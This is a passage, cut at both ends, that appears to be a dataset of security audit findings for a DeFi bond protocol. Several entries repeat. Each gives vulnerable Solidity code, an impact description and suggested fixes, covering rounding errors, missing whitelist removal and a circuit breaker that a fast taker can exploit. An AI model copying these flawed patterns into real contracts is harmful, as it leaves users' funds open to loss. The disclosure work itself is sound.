exploited by an attacker in the wild, the protocol needs to mitigate the issue swiftly by removing the vulnerable Auctioneer from the protocol. However, the mitigation effort will be hindered by the fact that there is no way to remove an Auctioneer within the protocol once it has been whitelisted. Thus, it might not be possible to stop the attacker from exploiting the vulnerable Auctioneer. The protocol team would need to find a workaround to block the attack, which will introduce an unnecessary delay to the recovery process where every second counts.\n Additionally, if the admin accidentally whitelisted the wrong Auctioneer, there is no way to remove it.ч```\nFile: BondAggregator.sol\n function registerAuctioneer(IBondAuctioneer auctioneer_) external requiresAuth {\n // Restricted to authorized addresses\n\n // Check that the auctioneer is not already registered\n if (_whitelist[address(auctioneer_)])\n revert Aggregator_AlreadyRegistered(address(auctioneer_));\n\n // Add the auctioneer to the whitelist\n auctioneers.push(auctioneer_);\n _whitelist[address(auctioneer_)] = true;\n }\n```\n -BondBaseSDA.setDefaults doesn't validate inputsчmediumчBondBaseSDA.setDefaults doesn't validate inputs which can lead to initializing new markets incorrectly\n```\n function setDefaults(uint32[6] memory defaults_) external override requiresAuth {\n // Restricted to authorized addresses\n defaultTuneInterval = defaults_[0];\n defaultTuneAdjustment = defaults_[1];\n minDebtDecayInterval = defaults_[2];\n minDepositInterval = defaults_[3];\n minMarketDuration = defaults_[4];\n minDebtBuffer = defaults_[5];\n }\n```\n\nFunction BondBaseSDA.setDefaults doesn't do any checks, as you can see. 
Because of that it's possible to provide values that will break market functionality.\nFor example you can set `minDepositInterval` to be bigger than `minMarketDuration` and it will not be possible to create a new market.\nOr you can provide `minDebtBuffer` to be 100% or 0%, which will break the logic of market closing.чAdd input validation.чCan't create a new market, or the market logic will not work as designed.ч```\n function setDefaults(uint32[6] memory defaults_) external override requiresAuth {\n // Restricted to authorized addresses\n defaultTuneInterval = defaults_[0];\n defaultTuneAdjustment = defaults_[1];\n minDebtDecayInterval = defaults_[2];\n minDepositInterval = defaults_[3];\n minMarketDuration = defaults_[4];\n minDebtBuffer = defaults_[5];\n }\n```\n -BondAggregator.liveMarketsBy eventually will revert because of block gas limitчmediumчBondAggregator.liveMarketsBy eventually will revert because of block gas limit\n```\n function liveMarketsBy(address owner_) external view returns (uint256[] memory) {\n uint256 count;\n IBondAuctioneer auctioneer;\n for (uint256 i; i < marketCounter; ++i) {\n auctioneer = marketsToAuctioneers[i];\n if (auctioneer.isLive(i) && auctioneer.ownerOf(i) == owner_) {\n ++count;\n }\n }\n\n\n uint256[] memory ids = new uint256[](count);\n count = 0;\n for (uint256 i; i < marketCounter; ++i) {\n auctioneer = marketsToAuctioneers[i];\n if (auctioneer.isLive(i) && auctioneer.ownerOf(i) == owner_) {\n ids[count] = i;\n ++count;\n }\n }\n\n\n return ids;\n }\n```\n\nBondAggregator.liveMarketsBy function is looping through all markets and does at least `marketCounter` amount of external calls (when all markets are not live) and at most 4 * `marketCounter` external calls (when all markets are live and the owner matches). This all consumes a lot of gas, even though it is called from a view function. 
And each new market increases the loop size.\nThat means that after some time the `marketsToAuctioneers` mapping will be big enough that the gas amount sent for a view/pure function will not be enough to retrieve all data (50 million gas according to this). So the function will revert.\nA similar problem also exists with the `findMarketFor`, `marketsFor` and `liveMarketsFor` functions.чRemove inactive markets, or add start and end indices to the functions.чFunctions will always revert and whoever depends on them will not be able to get information.ч```\n function liveMarketsBy(address owner_) external view returns (uint256[] memory) {\n uint256 count;\n IBondAuctioneer auctioneer;\n for (uint256 i; i < marketCounter; ++i) {\n auctioneer = marketsToAuctioneers[i];\n if (auctioneer.isLive(i) && auctioneer.ownerOf(i) == owner_) {\n ++count;\n }\n }\n\n\n uint256[] memory ids = new uint256[](count);\n count = 0;\n for (uint256 i; i < marketCounter; ++i) {\n auctioneer = marketsToAuctioneers[i];\n if (auctioneer.isLive(i) && auctioneer.ownerOf(i) == owner_) {\n ids[count] = i;\n ++count;\n }\n }\n\n\n return ids;\n }\n```\n -meta.tuneBelowCapacity param is not updated when BondBaseSDA.setIntervals is calledчmediumчWhen the BondBaseSDA.setIntervals function is called, the meta.tuneBelowCapacity param is not updated, which has an impact on price tuning.\n```\n function setIntervals(uint256 id_, uint32[3] calldata intervals_) external override {\n // Check that the market is live\n if (!isLive(id_)) revert Auctioneer_InvalidParams();\n\n\n // Check that the intervals are non-zero\n if (intervals_[0] == 0 || intervals_[1] == 0 || intervals_[2] == 0)\n revert Auctioneer_InvalidParams();\n\n\n // Check that tuneInterval >= tuneAdjustmentDelay\n if (intervals_[0] < intervals_[1]) revert Auctioneer_InvalidParams();\n\n\n BondMetadata storage meta = metadata[id_];\n // Check that tuneInterval >= depositInterval\n if (intervals_[0] < meta.depositInterval) revert 
Auctioneer_InvalidParams();\\n\\n\\n // Check that debtDecayInterval >= minDebtDecayInterval\\n if (intervals_[2] < minDebtDecayInterval) revert Auctioneer_InvalidParams();\\n\\n\\n // Check that sender is market owner\\n BondMarket memory market = markets[id_];\\n if (msg.sender != market.owner) revert Auctioneer_OnlyMarketOwner();\\n\\n\\n // Update intervals\\n meta.tuneInterval = intervals_[0];\\n meta.tuneIntervalCapacity = market.capacity.mulDiv(\\n uint256(intervals_[0]),\\n uint256(terms[id_].conclusion) - block.timestamp\\n ); // don't have a stored value for market duration, this will update tuneIntervalCapacity based on time remaining\\n meta.tuneAdjustmentDelay = intervals_[1];\\n meta.debtDecayInterval = intervals_[2];\\n }\\n```\\n\\n`meta.tuneInterval` has impact on `meta.tuneIntervalCapacity`. That means that when you change tuning interval you also change the capacity that is operated during tuning. There is also one more param that depends on this, but is not counted here.\\n```\\n if (\\n (market.capacity < meta.tuneBelowCapacity && timeNeutralCapacity < initialCapacity) ||\\n (time_ >= meta.lastTune + meta.tuneInterval && timeNeutralCapacity > initialCapacity)\\n ) {\\n // Calculate the correct payout to complete on time assuming each bond\\n // will be max size in the desired deposit interval for the remaining time\\n //\\n // i.e. market has 10 days remaining. deposit interval is 1 day. capacity\\n // is 10,000 TOKEN. 
max payout would be 1,000 TOKEN (10,000 * 1 / 10).\\n markets[id_].maxPayout = capacity.mulDiv(uint256(meta.depositInterval), timeRemaining);\\n\\n\\n // Calculate ideal target debt to satisty capacity in the remaining time\\n // The target debt is based on whether the market is under or oversold at this point in time\\n // This target debt will ensure price is reactive while ensuring the magnitude of being over/undersold\\n // doesn't cause larger fluctuations towards the end of the market.\\n //\\n // Calculate target debt from the timeNeutralCapacity and the ratio of debt decay interval and the length of the market\\n uint256 targetDebt = timeNeutralCapacity.mulDiv(\\n uint256(meta.debtDecayInterval),\\n uint256(meta.length)\\n );\\n\\n\\n // Derive a new control variable from the target debt\\n uint256 controlVariable = terms[id_].controlVariable;\\n uint256 newControlVariable = price_.mulDivUp(market.scale, targetDebt);\\n\\n\\n emit Tuned(id_, controlVariable, newControlVariable);\\n\\n\\n if (newControlVariable < controlVariable) {\\n // If decrease, control variable change will be carried out over the tune interval\\n // this is because price will be lowered\\n uint256 change = controlVariable - newControlVariable;\\n adjustments[id_] = Adjustment(change, time_, meta.tuneAdjustmentDelay, true);\\n } else {\\n // Tune up immediately\\n terms[id_].controlVariable = newControlVariable;\\n // Set current adjustment to inactive (e.g. if we are re-tuning early)\\n adjustments[id_].active = false;\\n }\\n\\n\\n metadata[id_].lastTune = time_;\\n metadata[id_].tuneBelowCapacity = market.capacity > meta.tuneIntervalCapacity\\n ? 
market.capacity - meta.tuneIntervalCapacity\\n : 0;\\n metadata[id_].lastTuneDebt = targetDebt;\\n }\\n```\\n\\nIf you don't update `meta.tuneBelowCapacity` when changing intervals you have a risk, that price will not be tuned when tuneIntervalCapacity was decreased or it will be still tuned when tuneIntervalCapacity was increased.\\nAs a result tuning will not be completed when needed.чUpdate meta.tuneBelowCapacity in BondBaseSDA.setIntervals function.чTuning logic will not be completed when needed.ч```\\n function setIntervals(uint256 id_, uint32[3] calldata intervals_) external override {\\n // Check that the market is live\\n if (!isLive(id_)) revert Auctioneer_InvalidParams();\\n\\n\\n // Check that the intervals are non-zero\\n if (intervals_[0] == 0 || intervals_[1] == 0 || intervals_[2] == 0)\\n revert Auctioneer_InvalidParams();\\n\\n\\n // Check that tuneInterval >= tuneAdjustmentDelay\\n if (intervals_[0] < intervals_[1]) revert Auctioneer_InvalidParams();\\n\\n\\n BondMetadata storage meta = metadata[id_];\\n // Check that tuneInterval >= depositInterval\\n if (intervals_[0] < meta.depositInterval) revert Auctioneer_InvalidParams();\\n\\n\\n // Check that debtDecayInterval >= minDebtDecayInterval\\n if (intervals_[2] < minDebtDecayInterval) revert Auctioneer_InvalidParams();\\n\\n\\n // Check that sender is market owner\\n BondMarket memory market = markets[id_];\\n if (msg.sender != market.owner) revert Auctioneer_OnlyMarketOwner();\\n\\n\\n // Update intervals\\n meta.tuneInterval = intervals_[0];\\n meta.tuneIntervalCapacity = market.capacity.mulDiv(\\n uint256(intervals_[0]),\\n uint256(terms[id_].conclusion) - block.timestamp\\n ); // don't have a stored value for market duration, this will update tuneIntervalCapacity based on time remaining\\n meta.tuneAdjustmentDelay = intervals_[1];\\n meta.debtDecayInterval = intervals_[2];\\n }\\n```\\n -Existing Circuit Breaker Implementation Allow Faster Taker To Extract Payout Tokens From MarketчmediumчThe 
current implementation of the circuit breaker is not optimal. Thus, the market maker will lose an excessive amount of payout tokens if a quoted token suddenly loses a large amount of value, even with a circuit breaker in place.\\nWhen the amount of the payout tokens purchased by the taker exceeds the `term.maxDebt`, the taker is still allowed to carry on with the transaction, and the market will only be closed after the current transaction is completed.\\n```\\nFile: BondBaseSDA.sol\\n // Circuit breaker. If max debt is breached, the market is closed\\n if (term.maxDebt < market.totalDebt) {\\n _close(id_);\\n } else {\\n // If market will continue, the control variable is tuned to to expend remaining capacity over remaining market duration\\n _tune(id_, currentTime, price);\\n }\\n```\\n\\nAssume that the state of the SDAM at T0 is as follows:\\n`term.maxDebt` is 110 (debt buffer = 10%)\\n`maxPayout` is 100\\n`market.totalDebt` is 99\\nAssume that the quoted token suddenly loses a large amount of value (e.g. stablecoin depeg causing the quote token to drop to almost zero). Bob decided to purchase as many payout tokens as possible before reaching the `maxPayout` limit to maximize the value he could extract from the market. Assume that Bob is able to purchase 50 bond tokens at T1 before reaching the `maxPayout` limit. As such, the state of the SDAM at T1 will be as follows:\\n`term.maxDebt` = 110\\n`maxPayout` = 100\\n`market.totalDebt` = 99 + 50 = 149\\nIn the above scenario, Bob's purchase has already breached the `term.maxDebt` limit. 
However, he could still purchase the 50 bond tokens in the current transaction.чConsider only allowing takers to purchase bond tokens up to the `term.maxDebt` limit.\\nFor instance, based on the earlier scenario, only allow Bob to purchase up to 11 bond tokens (term.maxDebt[110] - market.totalDebt[99]) instead of allowing him to purchase 50 bond tokens.\\nIf Bob attempts to purchase 50 bond tokens, the market can proceed to purchase the 11 bond tokens for Bob, and the remaining quote tokens can be refunded back to Bob. After that, since the `term.maxDebt (110) == market.totalDebt (110)`, the market can trigger the circuit breaker to close the market to protect the market from potential extreme market conditions.\\nThis ensures that bond tokens beyond the `term.maxDebt` limit would not be sold to the taker during extreme market conditions.чIn the event that the price of the quote token falls to almost zero (e.g. 0.0001 dollars), then the fastest taker will be able to extract as many payout tokens as possible before reaching the `maxPayout` limit from the market. The extracted payout tokens are essentially free for the fastest taker. Taker gain is maker loss.\\nAdditionally, in the event that a quoted token suddenly loses a large amount of value, the amount of payout tokens lost by the market maker is capped at the `maxPayout` limit instead of capping the loss at the `term.maxDebt` limit. This results in the market makers losing more payout tokens than expected, and their payout tokens being sold to the takers at a very low price (e.g. 0.0001 dollars).\\nThe market makers will suffer more loss if the `maxPayout` limit of their markets is higher.ч```\\nFile: BondBaseSDA.sol\\n // Circuit breaker. 
If max debt is breached, the market is closed\\n if (term.maxDebt < market.totalDebt) {\\n _close(id_);\\n } else {\\n // If market will continue, the control variable is tuned to to expend remaining capacity over remaining market duration\\n _tune(id_, currentTime, price);\\n }\\n```\\n -Market Price Lower Than ExpectedчmediumчThe market price does not conform to the specification documented within the whitepaper. As a result, the computed market price is lower than expected.\\nThe following definition of the market price is taken from the whitepaper. Taken from Page 13 of the whitepaper - Definition 25\\n\\nThe integer implementation of the market price must be rounded up per the whitepaper. This ensures that the integer implementation of the market price is greater than or equal to the real value of the market price so as to protect makers from selling tokens at a lower price than expected.\\nWithin the `BondBaseSDA.marketPrice` function, the computation of the market price is rounded up in Line 688, which conforms to the specification.\\n```\\nFile: BondBaseSDA.sol\\n function marketPrice(uint256 id_) public view override returns (uint256) {\\n uint256 price = currentControlVariable(id_).mulDivUp(currentDebt(id_), markets[id_].scale);\\n\\n return (price > markets[id_].minPrice) ? 
price : markets[id_].minPrice;\\n }\\n```\\n\\nHowever, within the `BondBaseSDA._currentMarketPrice` function, the market price is rounded down, resulting in the makers selling tokens at a lower price than expected.\\n```\\nFile: BondBaseSDA.sol\\n function _currentMarketPrice(uint256 id_) internal view returns (uint256) {\\n BondMarket memory market = markets[id_];\\n return terms[id_].controlVariable.mulDiv(market.totalDebt, market.scale);\\n }\\n```\\nчEnsure the market price is rounded up so that the desired property can be achieved and the makers will not be selling tokens at a lower price than expected.\\n```\\nfunction _currentMarketPrice(uint256 id_) internal view returns (uint256) {\\n BondMarket memory market = markets[id_];\\n// Remove the line below\\n return terms[id_].controlVariable.mulDiv(market.totalDebt, market.scale);\\n// Add the line below\\n return terms[id_].controlVariable.mulDivUp(market.totalDebt, market.scale);\\n}\\n```\\nчLoss for the makers as their tokens are sold at a lower price than expected.\\nAdditionally, the affected `BondBaseSDA._currentMarketPrice` function is used within the `BondBaseSDA._decayAndGetPrice` function to derive the market price. Since a lower market price will be returned, this will lead to a higher amount of payout tokens. Subsequently, the `lastDecayIncrement` will be higher than expected, which will lead to a lower `totalDebt`. Lower debt means a lower market price will be computed later.ч```\\nFile: BondBaseSDA.sol\\n function marketPrice(uint256 id_) public view override returns (uint256) {\\n uint256 price = currentControlVariable(id_).mulDivUp(currentDebt(id_), markets[id_].scale);\\n\\n return (price > markets[id_].minPrice) ? 
price : markets[id_].minPrice;\\n }\\n```\\n -Teller Cannot Be Removed From Callback ContractчmediumчIf a vulnerable Teller is being exploited by an attacker, there is no way for the owner of the Callback Contract to remove the vulnerable Teller from their Callback Contract.\\nThe Callback Contract is missing the feature to remove a Teller. Once a Teller has been added to the whitelist (approvedMarkets mapping), it is not possible to remove the Teller from the whitelist.\\n```\\nFile: BondBaseCallback.sol\\n /* ========== WHITELISTING ========== */\\n\\n /// @inheritdoc IBondCallback\\n function whitelist(address teller_, uint256 id_) external override onlyOwner {\\n // Check that the market id is a valid, live market on the aggregator\\n try _aggregator.isLive(id_) returns (bool live) {\\n if (!live) revert Callback_MarketNotSupported(id_);\\n } catch {\\n revert Callback_MarketNotSupported(id_);\\n }\\n\\n // Check that the provided teller is the teller for the market ID on the stored aggregator\\n // We could pull the teller from the aggregator, but requiring the teller to be passed in\\n // is more explicit about which contract is being whitelisted\\n if (teller_ != address(_aggregator.getTeller(id_))) revert Callback_TellerMismatch();\\n\\n approvedMarkets[teller_][id_] = true;\\n }\\n```\\nчConsider implementing an additional function to allow the removal of a Teller from the whitelist (approvedMarkets mapping), so that a vulnerable Teller can be removed swiftly if needed.\\n```\\nfunction removeFromWhitelist(address teller_, uint256 id_) external override onlyOwner {\\n approvedMarkets[teller_][id_] = false;\\n}\\n```\\n\\nNote: Although the owner of the Callback Contract can DOS its own market by abusing the `removeFromWhitelist` function, no sensible owner would do so.чIn the event that a whitelisted Teller is found to be vulnerable and has been actively exploited by an attacker in the wild, the owner of the Callback Contract needs to mitigate the issue 
swiftly by removing the vulnerable Teller from the Callback Contract to stop it from draining the asset within the Callback Contract. However, the mitigation effort will be hindered by the fact there is no way to remove a Teller within the Callback Contract once it has been whitelisted. Thus, it might not be possible to stop the attacker from exploiting the vulnerable Teller to drain assets within the Callback Contract. The Callback Contract owners would need to find a workaround to block the attack, which will introduce an unnecessary delay to the recovery process where every second counts.\\nAdditionally, if the owner accidentally whitelisted the wrong Teller, there is no way to remove it.ч```\\nFile: BondBaseCallback.sol\\n /* ========== WHITELISTING ========== */\\n\\n /// @inheritdoc IBondCallback\\n function whitelist(address teller_, uint256 id_) external override onlyOwner {\\n // Check that the market id is a valid, live market on the aggregator\\n try _aggregator.isLive(id_) returns (bool live) {\\n if (!live) revert Callback_MarketNotSupported(id_);\\n } catch {\\n revert Callback_MarketNotSupported(id_);\\n }\\n\\n // Check that the provided teller is the teller for the market ID on the stored aggregator\\n // We could pull the teller from the aggregator, but requiring the teller to be passed in\\n // is more explicit about which contract is being whitelisted\\n if (teller_ != address(_aggregator.getTeller(id_))) revert Callback_TellerMismatch();\\n\\n approvedMarkets[teller_][id_] = true;\\n }\\n```\\n -Create Fee Discount Feature Is BrokenчmediumчThe create fee discount feature is found to be broken within the protocol.\\nThe create fee discount feature relies on the `createFeeDiscount` state variable to determine the fee to be discounted from the protocol fee. However, it was observed that there is no way to initialize the `createFeeDiscount` state variable. 
As a result, the `createFeeDiscount` state variable will always be zero.\\n```\\nFile: BondFixedExpiryTeller.sol\\n // If fee is greater than the create discount, then calculate the fee and store it\\n // Otherwise, fee is zero.\\n if (protocolFee > createFeeDiscount) {\\n // Calculate fee amount\\n uint256 feeAmount = amount_.mulDiv(protocolFee - createFeeDiscount, FEE_DECIMALS);\\n rewards[_protocol][underlying_] += feeAmount;\\n\\n // Mint new bond tokens\\n bondToken.mint(msg.sender, amount_ - feeAmount);\\n\\n return (bondToken, amount_ - feeAmount);\\n } else {\\n // Mint new bond tokens\\n bondToken.mint(msg.sender, amount_);\\n\\n return (bondToken, amount_);\\n }\\n```\\n\\n```\\nFile: BondFixedTermTeller.sol\\n // If fee is greater than the create discount, then calculate the fee and store it\\n // Otherwise, fee is zero.\\n if (protocolFee > createFeeDiscount) {\\n // Calculate fee amount\\n uint256 feeAmount = amount_.mulDiv(protocolFee - createFeeDiscount, FEE_DECIMALS);\\n rewards[_protocol][underlying_] += feeAmount;\\n\\n // Mint new bond tokens\\n _mintToken(msg.sender, tokenId, amount_ - feeAmount);\\n\\n return (tokenId, amount_ - feeAmount);\\n } else {\\n // Mint new bond tokens\\n _mintToken(msg.sender, tokenId, amount_);\\n\\n return (tokenId, amount_);\\n }\\n```\\nчImplement a setter method for the `createFeeDiscount` state variable and the necessary verification checks.\\n```\\nfunction setCreateFeeDiscount(uint48 createFeeDiscount_) external requiresAuth {\\n if (createFeeDiscount_ > protocolFee) revert Teller_InvalidParams();\\n if (createFeeDiscount_ > 5e3) revert Teller_InvalidParams();\\n createFeeDiscount = createFeeDiscount_;\\n}\\n```\\nчThe create fee discount feature is broken within the protocol. There is no way for the protocol team to configure a discount for the users of the `BondFixedExpiryTeller.create` and `BondFixedTermTeller.create` functions. 
As such, the users will not obtain any discount from the protocol when using the create function.ч```\\nFile: BondFixedExpiryTeller.sol\\n // If fee is greater than the create discount, then calculate the fee and store it\\n // Otherwise, fee is zero.\\n if (protocolFee > createFeeDiscount) {\\n // Calculate fee amount\\n uint256 feeAmount = amount_.mulDiv(protocolFee - createFeeDiscount, FEE_DECIMALS);\\n rewards[_protocol][underlying_] += feeAmount;\\n\\n // Mint new bond tokens\\n bondToken.mint(msg.sender, amount_ - feeAmount);\\n\\n return (bondToken, amount_ - feeAmount);\\n } else {\\n // Mint new bond tokens\\n bondToken.mint(msg.sender, amount_);\\n\\n return (bondToken, amount_);\\n }\\n```\\n -`BondAggregator.findMarketFor` Function Will Break In Certain Conditionsчmediumч`BondAggregator.findMarketFor` function will break when the `BondBaseSDA.payoutFor` function within the for-loop reverts under certain conditions.\\nThe `BondBaseSDA.payoutFor` function will revert if the computed payout is larger than the market's max payout. Refer to Line 711 below.\\n```\\nFile: BondBaseSDA.sol\\n function payoutFor(\\n uint256 amount_,\\n uint256 id_,\\n address referrer_\\n ) public view override returns (uint256) {\\n // Calculate the payout for the given amount of tokens\\n uint256 fee = amount_.mulDiv(_teller.getFee(referrer_), 1e5);\\n uint256 payout = (amount_ - fee).mulDiv(markets[id_].scale, marketPrice(id_));\\n\\n // Check that the payout is less than or equal to the maximum payout,\\n // Revert if not, otherwise return the payout\\n if (payout > markets[id_].maxPayout) {\\n revert Auctioneer_MaxPayoutExceeded();\\n } else {\\n return payout;\\n }\\n }\\n```\\n\\nThe `BondAggregator.findMarketFor` function will call the `BondBaseSDA.payoutFor` function at Line 245. The `BondBaseSDA.payoutFor` function will revert if the final computed payout is larger than the `markets[id_].maxPayout` as mentioned earlier. 
This will cause the entire for-loop to \"break\" and the transaction to revert.\\nAssume that the user configures the `minAmountOut_` to be `0`, then the condition `minAmountOut_ <= maxPayout` Line 244 will always be true. The `amountIn_` will always be passed to the `payoutFor` function. In some markets where the computed payout is larger than the market's max payout, the `BondAggregator.findMarketFor` function will revert.\\n```\\nFile: BondAggregator.sol\\n /// @inheritdoc IBondAggregator\\n function findMarketFor(\\n address payout_,\\n address quote_,\\n uint256 amountIn_,\\n uint256 minAmountOut_,\\n uint256 maxExpiry_\\n ) external view returns (uint256) {\\n uint256[] memory ids = marketsFor(payout_, quote_);\\n uint256 len = ids.length;\\n uint256[] memory payouts = new uint256[](len);\\n\\n uint256 highestOut;\\n uint256 id = type(uint256).max; // set to max so an empty set doesn't return 0, the first index\\n uint48 vesting;\\n uint256 maxPayout;\\n IBondAuctioneer auctioneer;\\n for (uint256 i; i < len; ++i) {\\n auctioneer = marketsToAuctioneers[ids[i]];\\n (, , , , vesting, maxPayout) = auctioneer.getMarketInfoForPurchase(ids[i]);\\n\\n uint256 expiry = (vesting <= MAX_FIXED_TERM) ? block.timestamp + vesting : vesting;\\n\\n if (expiry <= maxExpiry_) {\\n payouts[i] = minAmountOut_ <= maxPayout\\n ? payoutFor(amountIn_, ids[i], address(0))\\n : 0;\\n\\n if (payouts[i] > highestOut) {\\n highestOut = payouts[i];\\n id = ids[i];\\n }\\n }\\n }\\n\\n return id;\\n }\\n```\\nчConsider using try-catch or address.call to handle the revert of the `BondBaseSDA.payoutFor` function within the for-loop gracefully. This ensures that a single revert of the `BondBaseSDA.payoutFor` function will not affect the entire for-loop within the `BondAggregator.findMarketFor` function.чThe find market feature within the protocol is broken under certain conditions. As such, users would not be able to obtain the list of markets that meet their requirements. 
The market makers affected by this issue will lose the opportunity to sell their bond tokens.ч```\\nFile: BondBaseSDA.sol\\n function payoutFor(\\n uint256 amount_,\\n uint256 id_,\\n address referrer_\\n ) public view override returns (uint256) {\\n // Calculate the payout for the given amount of tokens\\n uint256 fee = amount_.mulDiv(_teller.getFee(referrer_), 1e5);\\n uint256 payout = (amount_ - fee).mulDiv(markets[id_].scale, marketPrice(id_));\\n\\n // Check that the payout is less than or equal to the maximum payout,\\n // Revert if not, otherwise return the payout\\n if (payout > markets[id_].maxPayout) {\\n revert Auctioneer_MaxPayoutExceeded();\\n } else {\\n return payout;\\n }\\n }\\n```\\n -Auctioneer Cannot Be Removed From The ProtocolчmediumчIf a vulnerable Auctioneer is being exploited by an attacker, there is no way to remove the vulnerable Auctioneer from the protocol.\\nThe protocol is missing the feature to remove an auctioneer. Once an auctioneer has been added to the whitelist, it is not possible to remove the auctioneer from the whitelist.\\n```\\nFile: BondAggregator.sol\\n function registerAuctioneer(IBondAuctioneer auctioneer_) external requiresAuth {\\n // Restricted to authorized addresses\\n\\n // Check that the auctioneer is not already registered\\n if (_whitelist[address(auctioneer_)])\\n revert Aggregator_AlreadyRegistered(address(auctioneer_));\\n\\n // Add the auctioneer to the whitelist\\n auctioneers.push(auctioneer_);\\n _whitelist[address(auctioneer_)] = true;\\n }\\n```\\nчConsider implementing an additional function to allow the removal of an Auctioneer from the whitelist, so that vulnerable Auctioneer can be removed swiftly if needed.\\n```\\nfunction deregisterAuctioneer(IBondAuctioneer auctioneer_) external requiresAuth {\\n // Remove the auctioneer from the whitelist\\n _whitelist[address(auctioneer_)] = false;\\n}\\n```\\nчIn the event that a whitelisted Auctioneer is found to be vulnerable and has been actively 
exploited by an attacker in the wild, the protocol needs to mitigate the issue swiftly by removing the vulnerable Auctioneer from the protocol. However, the mitigation effort will be hindered by the fact there is no way to remove an Auctioneer within the protocol once it has been whitelisted. Thus, it might not be possible to stop the attacker from exploiting the vulnerable Auctioneer. The protocol team would need to find a workaround to block the attack, which will introduce an unnecessary delay to the recovery process where every second counts.\\nAdditionally, if the admin accidentally whitelisted the wrong Auctioneer, there is no way to remove it.ч```\\nFile: BondAggregator.sol\\n function registerAuctioneer(IBondAuctioneer auctioneer_) external requiresAuth {\\n // Restricted to authorized addresses\\n\\n // Check that the auctioneer is not already registered\\n if (_whitelist[address(auctioneer_)])\\n revert Aggregator_AlreadyRegistered(address(auctioneer_));\\n\\n // Add the auctioneer to the whitelist\\n auctioneers.push(auctioneer_);\\n _whitelist[address(auctioneer_)] = true;\\n }\\n```\\n -Debt Decay Faster Than ExpectedчmediumчThe debt decay at a rate faster than expected, causing market makers to sell bond tokens at a lower price than expected.\\nThe following definition of the debt decay reference time following any purchases at time `t` taken from the whitepaper. The second variable, which is the delay increment, is rounded up. Following is taken from Page 15 of the whitepaper - Definition 27\\n\\nHowever, the actual implementation in the codebase differs from the specification. 
At Line 514, the delay increment is rounded down instead.\\n```\\nFile: BondBaseSDA.sol\\n // Set last decay timestamp based on size of purchase to linearize decay\\n uint256 lastDecayIncrement = debtDecayInterval.mulDiv(payout_, lastTuneDebt);\\n metadata[id_].lastDecay += uint48(lastDecayIncrement);\\n```\\nчWhen computing the `lastDecayIncrement`, the result should be rounded up.\\n```\\n// Set last decay timestamp based on size of purchase to linearize decay\\n// Remove the line below\\n uint256 lastDecayIncrement = debtDecayInterval.mulDiv(payout_, lastTuneDebt);\\n// Add the line below\\n uint256 lastDecayIncrement = debtDecayInterval.mulDivUp(payout_, lastTuneDebt);\\nmetadata[id_].lastDecay // Add the line below\\n= uint48(lastDecayIncrement);\\n```\\nчWhen the delay increment (TD) is rounded down, the debt decay reference time increment will be smaller than expected. The debt component will then decay at a faster rate. As a result, the market price will not be adjusted in an optimized manner, and the market price will fall faster than expected, causing market makers to sell bond tokens at a lower price than expected.\\nFollowing is taken from Page 8 of the whitepaper - Definition 8\\nч```\\nFile: BondBaseSDA.sol\\n // Set last decay timestamp based on size of purchase to linearize decay\\n uint256 lastDecayIncrement = debtDecayInterval.mulDiv(payout_, lastTuneDebt);\\n metadata[id_].lastDecay += uint48(lastDecayIncrement);\\n```\\n -BondBaseSDA.setDefaults doesn't validate inputsчmediumчBondBaseSDA.setDefaults doesn't validate inputs which can lead to initializing new markets incorrectly\\n```\\n function setDefaults(uint32[6] memory defaults_) external override requiresAuth {\\n // Restricted to authorized addresses\\n defaultTuneInterval = defaults_[0];\\n defaultTuneAdjustment = defaults_[1];\\n minDebtDecayInterval = defaults_[2];\\n minDepositInterval = defaults_[3];\\n minMarketDuration = defaults_[4];\\n minDebtBuffer = defaults_[5];\\n 
}\\n```\\n\\nFunction BondBaseSDA.setDefaults doesn't do any checks, as you can see. Because of that it's possible to provide values that will break market functionality.\\nFor example you can set `minDepositInterval` to be bigger than `minMarketDuration` and it will not be possible to create a new market.\\nOr you can provide `minDebtBuffer` to be 100% or 0% that will break the logic of market closing.чAdd input validation.чCan't create a new market, or market logic will not work as designed.ч```\\n function setDefaults(uint32[6] memory defaults_) external override requiresAuth {\\n // Restricted to authorized addresses\\n defaultTuneInterval = defaults_[0];\\n defaultTuneAdjustment = defaults_[1];\\n minDebtDecayInterval = defaults_[2];\\n minDepositInterval = defaults_[3];\\n minMarketDuration = defaults_[4];\\n minDebtBuffer = defaults_[5];\\n }\\n```\\n -BondAggregator.liveMarketsBy eventually will revert because of block gas limitчmediumчBondAggregator.liveMarketsBy eventually will revert because of block gas limit\\n```\\n function liveMarketsBy(address owner_) external view returns (uint256[] memory) {\\n uint256 count;\\n IBondAuctioneer auctioneer;\\n for (uint256 i; i < marketCounter; ++i) {\\n auctioneer = marketsToAuctioneers[i];\\n if (auctioneer.isLive(i) && auctioneer.ownerOf(i) == owner_) {\\n ++count;\\n }\\n }\\n\\n\\n uint256[] memory ids = new uint256[](count);\\n count = 0;\\n for (uint256 i; i < marketCounter; ++i) {\\n auctioneer = marketsToAuctioneers[i];\\n if (auctioneer.isLive(i) && auctioneer.ownerOf(i) == owner_) {\\n ids[count] = i;\\n ++count;\\n }\\n }\\n\\n\\n return ids;\\n }\\n```\\n\\nBondAggregator.liveMarketsBy function is looping through all markets and does at least `marketCounter` amount of external calls (when all markets are not live) and at most 4 * `marketCounter` external calls (when all markets are live and the owner matches). This all consumes a lot of gas, even though it is called from a view function. 
And each new market increases loop size.\\nThat means that after some time `marketsToAuctioneers` mapping will be big enough that the gas amount sent for view/pure function will be not enough to retrieve all data(50 million gas according to this). So the function will revert.\\nAlso similar problem is with `findMarketFor`, `marketsFor` and `liveMarketsFor` functions.чRemove not active markets or some start and end indices to functions.чFunctions will always revert and whoever depends on it will not be able to get information.ч```\\n function liveMarketsBy(address owner_) external view returns (uint256[] memory) {\\n uint256 count;\\n IBondAuctioneer auctioneer;\\n for (uint256 i; i < marketCounter; ++i) {\\n auctioneer = marketsToAuctioneers[i];\\n if (auctioneer.isLive(i) && auctioneer.ownerOf(i) == owner_) {\\n ++count;\\n }\\n }\\n\\n\\n uint256[] memory ids = new uint256[](count);\\n count = 0;\\n for (uint256 i; i < marketCounter; ++i) {\\n auctioneer = marketsToAuctioneers[i];\\n if (auctioneer.isLive(i) && auctioneer.ownerOf(i) == owner_) {\\n ids[count] = i;\\n ++count;\\n }\\n }\\n\\n\\n return ids;\\n }\\n```\\n -meta.tuneBelowCapacity param is not updated when BondBaseSDA.setIntervals is calledчmediumчWhen BondBaseSDA.setIntervals function is called then meta.tuneBelowCapacity param is not updated which has impact on price tuning.\\n```\\n function setIntervals(uint256 id_, uint32[3] calldata intervals_) external override {\\n // Check that the market is live\\n 